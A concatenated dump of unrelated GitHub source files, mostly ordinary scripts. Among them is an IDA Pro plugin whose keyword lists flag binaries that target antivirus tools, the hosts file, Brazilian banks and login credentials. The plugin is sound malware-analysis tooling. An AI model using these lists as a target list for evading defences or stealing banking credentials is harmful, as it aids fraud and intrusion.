range(len(graph)):\n print(i,end=\" \")\n for j in range(len(graph[i])):\n print(graph[i][j],end=\"\\t\")\n print(\" ]\")\n return n,data,edges\n\ndef objectif_func(list,weights):\n tmp = []\n for i in range(len(list)-1):\n t = list[i]\n t_1 = list[i+1]\n print(t)\n tmp.append(weights[t][t_1])\n return sum(tmp)\n\ndef main():\n model = cp_model.CpModel()\n\n n,data,edges = read_data(\"graph\",'r+')\n print(edges)\n data_flat = list(chain.from_iterable(data))\n min_w = min(data_flat)\n max_w = max(data_flat)\n vars = []\n weights = []\n\n for i in range(n):\n vars.append(model.NewIntVar( 0, n-1, \"a\"+str(i)))\n model.AddAllDifferent(vars)\n for i in range(n-1):\n weights.append(model.NewIntVar(min_w,max_w,\"w\"+str(1)))\n model.AddAllDifferent(weights)\n for i in range(n-1):\n model.AddAllowedAssignments( 
(vars[i],vars[i+1],weights[i]), edges)\n\n model.Maximize(sum(weights))\n\n # model.Maximize(objectif_func(vars,data))\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n s = 0\n if status == cp_model.OPTIMAL or status == cp_model.FEASIBLE:\n for w in weights:\n s = s + solver.Value(w)\n print(s)\n else:\n print('No solution found.')\n\n solver.ObjectiveValue()\n for i in range(n):\n if i < n-1:\n print(solver.Value(vars[i]),\"-\",solver.Value(weights[i]),\"->\",end=\" \")\n else :\n print(solver.Value(vars[i]))\n\n print('\\n')\n s = 0\n if status == cp_model.OPTIMAL or status == cp_model.FEASIBLE:\n for w in weights:\n s = s + solver.Value(w)\n print(s)\n else:\n print('No solution found.')\n\nif __name__ == '__main__':\n main()","repo_name":"khalidchbab/complexity_longest_path_problem","sub_path":"main_working.py","file_name":"main_working.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14021712689","text":"#!/usr/bin/env python\n\n\"\"\"strings_suspicious.py: Enumerate suspicious strings.\"\"\"\n\n__author__\t= \"Neriberto C.Prado\"\n__copyright__\t= \"Copyright 2015, Neriberto C.Prado\"\n\nfrom idaapi import *\nfrom idc import *\nfrom idautils import *\nimport ctypes\nfrom PySide import QtGui, QtCore\n\n# Disable Security\ndisable_security = [\n \"antivirus\",\n \"antivirusproduct\",\n \"spywareproduct\",\n \"firewallproduct\",\n \"symantec\",\n \"kaspersky\",\n \"kasper~1\",\n \"mcafee\",\n \"avg.com\",\n \"grisoft\",\n \"avastui.exe\",\n \"avastsvc.exe\",\n \"aswchlic.exe\",\n \"ashupd.exe\",\n \"alwil software\",\n \"avast software\",\n \"vipre\",\n \"gfi\",\n \"sunbelt\",\n \"panda\",\n \"security\",\n \"eset\",\n \"nod32\",\n \"avira\",\n \"avp.exe\",\n \"windows defender\",\n \"winddefend\",\n \"wscsvc\",\n \"wuauserv\",\n \"bits\",\n \"ersvc\",\n \"wersvc\",\n \"trendmicro\",\n \"clamav\",\n \"clamd\",\n \"wireshark\",\n \"tcpview\",\n \"regmon\",\n \"procmon\",\n \"procexp\",\n \"mbsa\",\n \"filemon\",\n \"autoruns\",\n \"{fd6905ce-952f-41f1-9a6f-135d9c6622cc}\",\n \"hosts\",\n \":\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts\",\n \":\\\\winnt\\\\system32\\\\drivers\\\\etc\\\\hosts\",\n \":\\\\windows\\\\hosts\",\n \"\\\\drivers\\\\etc\\\\hosts\"\n]\n\n# Brazilian Bankers\nbbankers = [\n \"gbplugin\",\n \"cef.gpc\",\n \"bb.gpc\",\n \"banerj\",\n \"bovespa\",\n \"mercantildobrasil\",\n \"boavista\",\n \"bonsucesso\",\n \"bradesco\",\n \"brascan\",\n \"cacique\",\n \"Cifra\",\n \"citibank\",\n \"citicard\",\n \"bancocnh\",\n \"cnhcapital\",\n \"Sudameris\",\n \"sicredi\",\n \"cruzeiro\",\n \"daycoval\",\n \"bandepe\",\n \"dibens\",\n \"bancobrasil\",\n \"bb.com.br\",\n \"bbseguroauto.com.br\",\n \"www.bep.com.br\",\n \"besc.com.br\",\n \"fator.com.br\",\n \"bancofiat\",\n \"ficsa\",\n \"fidis\",\n \"finasa\",\n \"bmc.com.br\",\n \"bmcnet\",\n \"bancoford\",\n \"fordcredit\",\n \"bancoguanabara\",\n \"bcoguan\",\n \"bancohonda\",\n \"unibanco\",\n \"investcred\",\n \"itau\",\n \"safra\",\n \"mercantil\",\n \"bancooriginal\",\n \"panamericano.com.br\",\n \"real.com.br\",\n \"bancoreal\",\n \"rodobens\",\n \"santander\",\n \"sofisa\",\n \"sumitomo\",\n \"bancotoyota\",\n \"bancovw\",\n \"vw.com.br\",\n \"bancovolkswagen\",\n \"bancovotorantim\",\n \"yamaha-motor\",\n \"banestes\",\n \"banif\",\n \"hipercard\",\n \"hsbc\",\n \"jpmorgan\",\n \"bancobva\",\n \"bancofibra\",\n \"caixa.com.br\",\n \"nossacaixa\",\n \"internetcaixa\",\n \"rendimento.com.br\",\n 
\"scotiabank\",\n \"rural.com.br\",\n \"unicard\",\n \"cielo\",\n \"serasa\",\n \"banespa\",\n \"mercantil\",\n \"bancoamazonia\",\n \"banparanet\",\n \"equifax\",\n \"lusobrasileiro\"\n]\n\nterms = [\n\t'token',\n 'login',\n\t'password',\n\t'username',\n\t'usuario',\n\t'senha',\n\t'agencia',\n\t'banco',\n\t'cartao',\n\t'simples',\n\t'proxy',\n\t'desconectado',\n\t'reconectar',\n\t'conex',\n 'http',\n 'fuck',\n \"adobe\",\n \".cpl\",\n \"premios\",\n \"promocao\",\n \"portal\",\n \"credencie\",\n \"cadastramento\",\n \"fatura\",\n \"sorteio\"\n]\n\n\nclass ByteStringsViewer_t(PluginForm):\n\n name = \"Strings Suspicious\"\n\n def Show(self):\n return PluginForm.Show(self,self.name,options = PluginForm.FORM_PERSIST)\n\n def OnCreate(self,form):\n self.parent = self.FormToPySideWidget(form)\n self.byte_strings = {}\n self.table = QtGui.QTableWidget()\n self.table.setRowCount(1)\n self.table.setColumnCount(3)\n #self.table.setHorizontalHeaderLabels((\"Address\",\"Function\",\"String\"))\n self.table.setHorizontalHeaderLabels([\"Strings\"])\n layout = QtGui.QVBoxLayout()\n layout.addWidget(self.table)\n self.clipboard = QtGui.QClipboard()\n self.Create()\n self.parent.setLayout(layout)\n\n def OnClose(self,form):\n global ByteStringForm\n del ByteStringForm\n\n def click_row(self):\n i = self.table.item(self.table.currentRow(),0)\n bstr = self.table.item(self.table.currentRow(),2)\n addr = i.text().strip()\n bstr = bstr.text()\n if not addr.startswith(\"0x\"):\n addr = get_name_ea(BADADDR,str(addr))\n else:\n addr = addr[2:10]\n addr= int(addr,16)\n Jump(addr)\n self.clipboard.setText(bstr)\n return\n\n def Create(self):\n self.table.clear()\n self.table.setColumnCount(1)\n self.table.setHorizontalHeaderLabels([\"Strings\"])\n #self.table.setHorizontalHeaderLabels((\"Address\",\"Function\",\"String\"))\n #self.table.itemClicked.connect(self.click_row)\n self.find_byte_strings()\n self.table.setRowCount(len(self.byte_strings.keys()))\n row = 0\n for addr,bstr in self.byte_strings.items():\n #self.table.setItem(row,0,QtGui.QTableWidgetItem(addr))\n #self.table.setItem(row,1,QtGui.QTableWidgetItem(addr))\n self.table.setItem(row,0,QtGui.QTableWidgetItem(bstr))\n self.table.resizeRowToContents(row)\n row += 1\n self.table.setSortingEnabled(False)\n\n def find_byte_strings(self):\n global terms\n global bbankers\n global disable_security\n # Append Brazilian Bankers to terms\n terms += bbankers\n terms += disable_security\n count = 1\n for ss in Strings():\n s = str(ss)\n if s.lower() in terms:\n self.byte_strings[str(count)] = s\n count = count + 1\n\ndef find_all_byte_strings():\n global ByteStringForm\n ByteStringForm = ByteStringsViewer_t()\n ByteStringForm.Show()\n ByteStringForm.table.resizeRowsToContents()\n ByteStringForm.table.resizeColumnsToContents()\n\n\nfind_all_byte_strings()\n","repo_name":"neriberto/IDA-Pro-Scripts","sub_path":"neriberto/strings_suspicious.py","file_name":"strings_suspicious.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"38637813988","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('github', '0005_auto_20151028_1218'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='githuborgindexpage',\n old_name='url',\n new_name='api_url',\n ),\n 
]\n","repo_name":"City-of-Helsinki/devheldev","sub_path":"github/migrations/0006_auto_20151028_1221.py","file_name":"0006_auto_20151028_1221.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"66"} +{"seq_id":"12012621705","text":"fname = '/home/pinkgeek/PycharmProjects/PY4E/mbox-short.txt'\nfhand = open(fname)\ncounts = {}\n\n#Loop through text, getting timestamps\nfor line in fhand:\n words = line.split()\n if len(words) == 0: continue\n if words[0] != 'From': continue\n time = words[5]\n #Slice to get to the hour in the timestamp\n end = time.find(':')\n hour = time[0:end]\n # counter, add to dictionary: counts\n counts[hour] = counts.get(hour, 0) + 1\n\n#Create a list of tuples of the dictionary counts and sort\ncounter = list()\nfor k,v in list(counts.items()):\n counter.append((k,v))\n counter.sort()\n\n#Print sorted list, by hour:\nfor k,v in counter:\n print(k,v)\n","repo_name":"henkjeebee/Python3","sub_path":"Exercise 10.2.py","file_name":"Exercise 10.2.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21073550382","text":"class Object:\n def __init__(self, weight, value) -> None:\n super().__init__()\n self.weight = weight\n self.value = value\n self.ratio = value / weight\n\n def __lt__(self, other):\n return self.ratio < other.ratio\n\n def __eq__(self, other):\n return self.ratio == other.ratio\n\n def __repr__(self):\n return \"(\" + str(self.weight) + \", \" + str(self.value) + \") : \" + \"{0:.2f}\".format(self.ratio)\n\n\ndef read_file(path):\n objects = []\n with open(path, 'r') as file:\n capacity = int(file.readline())\n for line in file:\n exploded = line.split(' ')\n weight = int(exploded[0])\n value = int(exploded[1])\n objects.append(Object(weight, value))\n return capacity, sorted(objects, reverse=True)\n\n\ndef bound(objects, capacity_left, start):\n total_weight = 0\n total_value = 0\n for i in range(start, len(objects)):\n o = objects[i]\n if total_weight + o.weight >= capacity_left:\n place_left = capacity_left - total_weight\n ratio = place_left / o.weight\n total_value += o.value * ratio\n break\n total_value += o.value\n total_weight += o.weight\n return total_value\n\n\ndef branch(objects, max_value=0, deepness=0, weight=0, value=0):\n if deepness == len(objects):\n return value\n\n o = objects[deepness]\n\n b1 = value + bound(objects, capacity-weight, deepness)\n if b1 > max_value and weight+o.weight <= capacity:\n v1 = branch(objects, max_value, deepness+1, weight+o.weight, value+o.value)\n if v1 > max_value:\n max_value = v1\n\n b0 = value + bound(objects, capacity-weight, deepness+1)\n if b0 > max_value:\n v0 = branch(objects, max_value, deepness+1, weight, value)\n if v0 > max_value:\n max_value = v0\n\n return max_value\n\n\nif __name__ == '__main__':\n capacity, objects = read_file('data/sac0.txt')\n print(branch(objects))\n\n\n","repo_name":"LouisGerard/TP2_ARO","sub_path":"test_area.py","file_name":"test_area.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13995431390","text":"\"\"\"\r\n\r\n Lógica Difusa 01\r\n\r\n Santiago Ocampo Orrego - Código: 1004679255\r\n\r\n Ejemplo Futbol\r\n\r\n Cambios: - He modificado el diseño y la posición de las etiquetas\r\n\r\n\"\"\"\r\n\r\n# Paquetes requeridos\r\n\r\nimport numpy as np\r\nimport skfuzzy as 
sk\r\nimport matplotlib.pyplot as plt\r\n\r\n# Definiendo los rangos de velocidad de 0 a 80\r\nx = np.arange(30, 80, 0.1)\r\n\r\n# Definiendo las funciones de miembro triangulares\r\nlento = sk.trimf(x, [30, 30, 50])\r\nmedio = sk.trimf(x, [30, 50, 70])\r\nmedio_rapido = sk.trimf(x, [50, 60, 80])\r\nrapido = sk.trimf(x, [60, 80, 80])\r\n\r\n# Dibujando las funciones de membresía\r\nplt.figure()\r\nplt.plot(x, rapido, 'b', linewidth=1.5, label='Rápido')\r\nplt.plot(x, medio_rapido, 'k', linewidth=1.5, label='Medio-Rápido')\r\nplt.plot(x, medio, 'm', linewidth=1.5, label='Medio')\r\nplt.plot(x, lento, 'r', linewidth=1.5, label='Lento')\r\nplt.title('Penalti Difuso')\r\nplt.ylabel('Membresía')\r\nplt.xlabel('Velocidad (Kilometros Por Hora)')\r\nplt.legend(loc='best', fancybox=True, shadow=True)\r\n\r\nplt.show()","repo_name":"SantiagoOcampoOrrego/ComputacionBlanda","sub_path":"Tercera Previa/01 - Logica Difusa 01/futbol.py","file_name":"futbol.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32857297199","text":"import numpy as np\r\nfrom dezero import Variable\r\nimport dezero.functions as F\r\n\r\n\r\nx = Variable(np.array([[1, 2, 3], [4, 5, 6]]))\r\ny = F.sum(x, axis=0)\r\ny.backward()\r\nprint(x)\r\nprint(x.grad)\r\n\r\nx = Variable(np.random.randn(2, 3, 4, 5))\r\ny = x.sum(keepdims=True)\r\nprint(y.shape)","repo_name":"iinteger/deeplearning-from-scratch3","sub_path":"steps/step39.py","file_name":"step39.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"36932830047","text":"import Queue\n\n\nclass WorldMgr(object):\n    \"\"\"World Manager.\"\"\"\n    SYSTEM_LEVEL_FACTOR = 100\n    SYSTEM_COMMON_LEVEL = 5\n    entity_count = 0\n    system_count = 0\n    entity_id_record = 0\n    system_id_record = 0\n    system_dict = {}\n    entity_dict = {}\n    entity_add_queue = Queue.Queue()\n    entity_remove_queue = Queue.Queue()\n    system_entity_match_dict = {}\n\n    def __init__(self):\n        # TODO: sort system_dict\n        for system in self.system_dict.itervalues():\n            # print system.system_id\n            self.system_entity_match_dict[system.system_id] = set()\n\n    def update_all(self):\n        # print 'WorldMgr update_all'\n        self.update_entity_dict()\n        for system in self.system_dict.itervalues():\n            # print system.__class__\n            self.do_update(system.update_entity, system.system_id)\n\n    @classmethod\n    def add_system(cls, system_id, system):\n        cls.system_dict[system_id] = system\n\n    @classmethod\n    def add_entity(cls, entity):\n        # print entity.__class__\n        cls.entity_add_queue.put(entity)\n\n    @classmethod\n    def remove_entity(cls, entity):\n        cls.entity_remove_queue.put(entity)\n\n    @classmethod\n    def generate_system_id(cls):\n        cls.system_count += 1\n        cls.system_id_record += 1\n        return cls.system_id_record\n\n    @classmethod\n    def generate_entity_id(cls):\n        cls.entity_count += 1\n        cls.entity_id_record += 1\n        return cls.entity_id_record\n\n    @classmethod\n    def clear_world_mgr_state(cls):\n        raise NotImplementedError\n\n# private:\n\n    def update_entity_dict(self):\n        # Drain both pending queues in one pass; a single pass empties them,\n        # so no per-system iteration is needed here.\n        while not self.entity_add_queue.empty():\n            entity = self.entity_add_queue.get()\n            # print entity.__class__\n            self.do_add_entity(entity)\n\n        while not self.entity_remove_queue.empty():\n            entity = self.entity_remove_queue.get()\n            self.do_remove_entity(entity)\n\n
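    # do_update() applies func to every entity currently matched to the given\n    # system id; update_all() uses it to run each system over its entities.\n    @classmethod\n    def do_update(cls, func, system_id):\n        if 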
cls.system_entity_match_dict.get(system_id) is None:\n            # print system_id\n            return\n        for entity_id in cls.system_entity_match_dict[system_id]:\n            func(cls.entity_dict[entity_id])\n\n    @classmethod\n    def do_add_entity(cls, entity):\n        if not cls.entity_dict.get(entity.entity_id):\n            # print entity.entity_id\n            cls.entity_dict[entity.entity_id] = entity\n            cls.do_match_entity(entity)\n\n    @classmethod\n    def do_remove_entity(cls, entity):\n        if cls.entity_dict.get(entity.entity_id):\n            del cls.entity_dict[entity.entity_id]\n            cls.remove_entity_match(entity)\n\n    @classmethod\n    def do_match_entity(cls, entity):\n        cls.remove_entity_match(entity)\n        for system in cls.system_dict.itervalues():\n            if cls.match_components(entity, system.get_attached_components()):\n                cls.system_entity_match_dict[system.system_id]\\\n                    .add(entity.entity_id)\n\n    @classmethod\n    def remove_entity_match(cls, entity):\n        for system in cls.system_dict.itervalues():\n            if cls.system_entity_match_dict.get(system.system_id) is None:\n                # print system.system_id\n                return\n            cls.system_entity_match_dict[system.system_id]\\\n                .discard(entity.entity_id)\n\n    @classmethod\n    def match_components(cls, entity, components):\n        for component in components:\n            # print component\n            if not entity.has_component(component):\n                return False\n        return True\n","repo_name":"qtg2015sclt/GameServer","sub_path":"ecs/worldmgr.py","file_name":"worldmgr.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14716389122","text":"import os\nimport click\nfrom click.types import StringParamType\nimport functools\n\nfrom hamlet.command.common.config import Options\n\n\ndef get_home_dir_default(subdir=\"\"):\n    return os.path.join(\n        click.get_app_dir(app_name=\"hamlet\", force_posix=True, roaming=False), subdir\n    )\n\n\nclass CommaSplitParamType(StringParamType):\n    envvar_list_splitter = \",\"\n\n    def __repr__(self):\n        return \"STRING\"\n\n\ndef common_cli_config_options(func):\n    \"\"\"Add common CLI config options to commands\"\"\"\n\n    @click.option(\n        \"-p\",\n        \"--profile\",\n        default=None,\n        envvar=\"HAMLET_PROFILE\",\n        help=\"The name of the profile to use for configuration\",\n        show_envvar=True,\n    )\n    @click.option(\n        \"--hamlet-home-dir\",\n        type=click.Path(file_okay=False, dir_okay=True, readable=True, writable=True),\n        envvar=\"HAMLET_HOME_DIR\",\n        default=get_home_dir_default(),\n        help=\"The home directory used by hamlet\",\n        show_default=True,\n        show_envvar=True,\n    )\n    @click.option(\n        \"--cli-config-dir\",\n        type=click.Path(file_okay=False, dir_okay=True, readable=True),\n        envvar=\"HAMLET_CLI_CONFIG_DIR\",\n        default=get_home_dir_default(\"config\"),\n        help=\"The directory where profile configuration is stored\",\n        show_default=True,\n        show_envvar=True,\n    )\n    @click.pass_context\n    @functools.wraps(func)\n    def wrapper(ctx, *args, **kwargs):\n        \"\"\"\n        Config file handling\n        \"\"\"\n        opts = ctx.ensure_object(Options)\n        opts.hamlet_home_dir = kwargs.pop(\"hamlet_home_dir\")\n        opts.load_config_file(\n            profile=kwargs.pop(\"profile\"), searchpath=kwargs.pop(\"cli_config_dir\")\n        )\n\n        kwargs[\"opts\"] = opts\n        return ctx.invoke(func, *args, **kwargs)\n\n    return wrapper\n\n\n
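# A minimal usage sketch (illustrative only, not part of the original module):\n# the option decorators in this file are meant to stack under a click command.\n# The command name and body below are hypothetical.\n#\n#   @click.command()\n#   @common_cli_config_options\n#   def show_profile(opts):\n#       click.echo(opts.hamlet_home_dir)\n\n\ndef common_logging_options(func):\n    \"\"\"Add common options for logging\"\"\"\n\n    @click.option(\n        \"--log-level\",\n        envvar=\"GENERATION_LOG_LEVEL\",\n        type=click.Choice(\n            [\"fatal\", \"error\", \"warn\", \"info\", \"debug\", \"trace\"], case_sensitive=False\n        ),\n        default=\"info\",\n        help=\"The minimum log 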
event level\",\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"--log-format\",\n envvar=\"GENERATION_LOG_FORMAT\",\n type=click.Choice([\"compact\", \"full\"], case_sensitive=False),\n default=\"compact\",\n help=\"The format used for engine log messages\",\n show_default=True,\n show_envvar=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n Logging Options for the command line\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.log_level = kwargs.pop(\"log_level\")\n opts.log_format = kwargs.pop(\"log_format\")\n\n kwargs[\"opts\"] = opts\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n\n\ndef common_engine_options(func):\n \"\"\"Add common options for the engine\"\"\"\n\n @click.option(\n \"--engine\",\n envvar=\"HAMLET_ENGINE\",\n help=\"The name of the engine to use\",\n show_envvar=True,\n )\n @click.option(\n \"--engine-dir\",\n type=click.Path(\n dir_okay=True,\n file_okay=False,\n writable=True,\n readable=True,\n ),\n default=get_home_dir_default(\"engine\"),\n envvar=\"HAMLET_ENGINE_DIR\",\n help=\"The location of the hamlet engine store\",\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"--engine-config-dir\",\n type=click.Path(\n dir_okay=True,\n file_okay=False,\n writable=True,\n readable=True,\n ),\n default=get_home_dir_default(\"config\"),\n envvar=\"HAMLET_ENGINE_CONFIG\",\n help=\"The location of the hamlet engine config file for local engines\",\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"--engine-search-locations\",\n multiple=True,\n default=[\"installed\", \"local\", \"remote\"],\n type=click.Choice([\"installed\", \"local\", \"remote\", \"hidden\"]),\n show_default=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n Engine configuration options\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.set_engine_store(\n kwargs.pop(\"engine_dir\"), [kwargs.pop(\"engine_config_dir\")]\n )\n opts.set_engine(kwargs.pop(\"engine\"), kwargs.pop(\"engine_search_locations\"))\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n\n\ndef common_generation_options(func):\n \"\"\"Add common options for generation\"\"\"\n\n @click.option(\n \"-p\",\n \"--generation-provider\",\n envvar=\"GENERATION_PROVIDERS\",\n help=\"plugins to load for output generation\",\n default=[\"aws\"],\n type=CommaSplitParamType(),\n multiple=True,\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"-f\",\n \"--generation-framework\",\n help=\"output framework to use for output generation\",\n default=\"cf\",\n show_default=True,\n )\n @click.option(\n \"-i\",\n \"--generation-input-source\",\n help=\"source of input data to use when generating the output\",\n default=\"composite\",\n show_default=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n Logging Options for the command line\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.generation_provider = kwargs.pop(\"generation_provider\")\n opts.generation_framework = kwargs.pop(\"generation_framework\")\n opts.generation_input_source = kwargs.pop(\"generation_input_source\")\n\n kwargs[\"opts\"] = opts\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n\n\ndef common_district_options(func):\n \"\"\"Add Common options for district config\"\"\"\n\n @click.option(\n \"--root-dir\",\n envvar=\"ROOT_DIR\",\n help=\"The root CMDB directory\",\n show_envvar=True,\n type=click.Path(\n 
file_okay=False,\n dir_okay=True,\n writable=True,\n resolve_path=True,\n allow_dash=False,\n ),\n )\n @click.option(\n \"--district-type\",\n envvar=\"DISTRICT_TYPE\",\n help=\"The type of district to target\",\n default=\"segment\",\n show_envvar=True,\n )\n @click.option(\n \"--tenant\",\n envvar=\"TENANT\",\n help=\"The tenant name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--account\",\n envvar=\"ACCOUNT\",\n help=\"The account name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--product\",\n envvar=\"PRODUCT\",\n help=\"The product name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--environment\",\n envvar=\"ENVIRONMENT\",\n help=\"The environment name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--segment\",\n envvar=\"SEGMENT\",\n help=\"The segment name to use\",\n show_envvar=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n District options from cmd line or file\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.root_dir = kwargs.pop(\"root_dir\")\n opts.district_type = kwargs.pop(\"district_type\")\n opts.tenant = kwargs.pop(\"tenant\")\n opts.account = kwargs.pop(\"account\")\n opts.product = kwargs.pop(\"product\")\n opts.environment = kwargs.pop(\"environment\")\n opts.segment = kwargs.pop(\"segment\")\n\n kwargs[\"opts\"] = opts\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n","repo_name":"hamlet-io/executor-python","sub_path":"hamlet/command/common/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"22354746271","text":"\"\"\"Test Kevo hub.\"\"\"\nfrom bs4 import BeautifulSoup\n\nimport websockets\nimport json\nimport asyncio\nimport aiohttp\n\n\nclass KevoError(Exception):\n \"\"\"Base exception for all Kevo errors\"\"\"\n\n pass\n\n\nclass Kevo(object):\n \"\"\"\n Common mykevo.com operations\n \"\"\"\n\n KEVO_URL_BASE = \"https://www.mykevo.com\"\n COMMANDS_URL_BASE = KEVO_URL_BASE + \"/user/remote_locks/command\"\n\n START_URL = KEVO_URL_BASE + \"/login\"\n LOGIN_URL = KEVO_URL_BASE + \"/signin\"\n AUTH_URL = KEVO_URL_BASE + \"/user/remote_locks/auth/show.json\"\n\n _loop = asyncio.get_event_loop()\n _callbacks = set()\n\n def __init__(self, username, password):\n self._username = username\n self._password = password\n self.session = None\n\n async def GetCsrfToken(self):\n \"\"\"\n Get a mykevo.com crsf token\n\n Returns:\n A csrf token (str)\n \"\"\"\n token = None\n\n async with self.session.get(Kevo.START_URL) as result:\n page = await result.text()\n login_page = BeautifulSoup(page, \"html.parser\")\n for field in login_page.find_all(\"input\"):\n if field.get(\"name\") == \"authenticity_token\":\n token = field.get(\"value\")\n break\n if not token:\n raise KevoError(\"Could not find auth token on signin page\")\n\n Kevo.token = token\n return token\n\n async def Login(self):\n \"\"\"\n Create a http session and login to mykevo.com\n \"\"\"\n self.session = aiohttp.ClientSession()\n token = await self.GetCsrfToken()\n login_payload = {\n \"user[username]\": self._username,\n \"user[password]\": self._password,\n \"authenticity_token\": token,\n }\n async with self.session.post(Kevo.LOGIN_URL, data=login_payload) as result:\n await result.text()\n\n async def _authGet(self, url):\n \"\"\"\n Perform an HTTP get to the url, and login if required\n\n Args:\n url: The url to perform the get request against\n\n 
Returns:\n            The decoded JSON response (dict)\n        \"\"\"\n        if self.session is None:\n            result = await self._authLoginGet(url)\n\n        else:\n            async with self.session.get(url) as resp:\n                if resp.status == 500:\n                    result = await self._authLoginGet(url)\n                else:\n                    result = await resp.json()\n\n        return result\n\n    async def _authLoginGet(self, url):\n        \"\"\"\n        Login and perform an HTTP GET to the url specified\n\n        Args:\n            url: The url to perform the get request against\n\n        Returns:\n            The decoded JSON response (dict)\n        \"\"\"\n        await self.Login()\n\n        async with self.session.get(url) as resp:\n            if resp.status == 500:\n                raise KevoError(\n                    \"Unable to connect to kevo api: {}\".format(await resp.text())\n                )\n\n            result = await resp.json()\n\n        return result\n\n    async def GetLock(self, lockID):\n        \"\"\"\n        Gets details for a lock\n\n        Args:\n            lockID: The ID of the lock to query\n\n        Returns:\n            The lock details (dict)\n        \"\"\"\n        lock_detail_url = Kevo.COMMANDS_URL_BASE + \"/lock.json?arguments={}\".format(\n            lockID\n        )\n        lock_details = await self._authGet(lock_detail_url)\n\n        return lock_details\n\n    def Register_callback(self, callback):\n        \"\"\"Register callback, called when lock changes state.\"\"\"\n        self._callbacks.add(callback)\n\n    def Remove_callback(self, callback):\n        \"\"\"Remove previously registered callback.\"\"\"\n        self._callbacks.discard(callback)\n\n    def ConnectWebSocket(self):\n        \"\"\"Starts a task with a loop for the websocket connection\"\"\"\n        self._loop.create_task(self._getStatusLoop())\n\n    async def _getWsUrl(self):\n        auth_details = await self._authGet(Kevo.AUTH_URL)\n\n        wsurl = auth_details[\"socket_location\"]\n\n        return wsurl\n\n    async def _getStatusLoop(self):\n\n        wsurl = await self._getWsUrl()\n\n        async with websockets.connect(wsurl) as websocket:\n            while True:\n                try:\n                    text = await websocket.recv()\n                except websockets.ConnectionClosed as e:\n                    if e.code == 1000:\n                        break\n                    # TODO: handle restarting the connection\n                    else:\n                        raise e\n                for callback in self._callbacks:\n                    callback(json.loads(text))\n\n    async def Lock(self, lockID):\n        \"\"\"\n        Lock this lock. If the lock is already locked, this method has no effect.\n        \"\"\"\n        command_url = Kevo.COMMANDS_URL_BASE + \"/remote_lock.json?arguments={}\".format(\n            lockID\n        )\n        await self._authGet(command_url)\n\n
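    # Usage sketch (illustrative only; the credentials and lock id below are\n    # placeholders, not values from this project):\n    #\n    #   kevo = Kevo(\"user@example.com\", \"password\")\n    #   loop = asyncio.get_event_loop()\n    #   loop.run_until_complete(kevo.Lock(\"lock-id\"))\n\n    async def Unlock(self, lockID):\n        \"\"\"\n        Unlock this lock. 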
If the lock is already unlocked, this method has no effect.\n \"\"\"\n command_url = (\n Kevo.COMMANDS_URL_BASE + \"/remote_unlock.json?arguments={}\".format(lockID)\n )\n await self._authGet(command_url)\n","repo_name":"Noglen/hasskevo","sub_path":"custom_components/hasskevo/pykevo.py","file_name":"pykevo.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32851564882","text":"import argparse\nimport os\nimport os.path as osp\n\nimport cv2\nimport numpy as np\nimport pytorch_lightning\nimport torch\nfrom mmcv import Config\nfrom torchvision.transforms import ToTensor\nfrom tqdm import tqdm\nfrom models import MODELS\n\n\n# output dir\n_OUT_DIR = 'evaluation/star_result/'\n\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n '.tif', '.TIF', '.tiff', '.TIFF',\n]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--root_dir', type=str, default='data/CORN_2/testA', help='Tested dataset.')\n 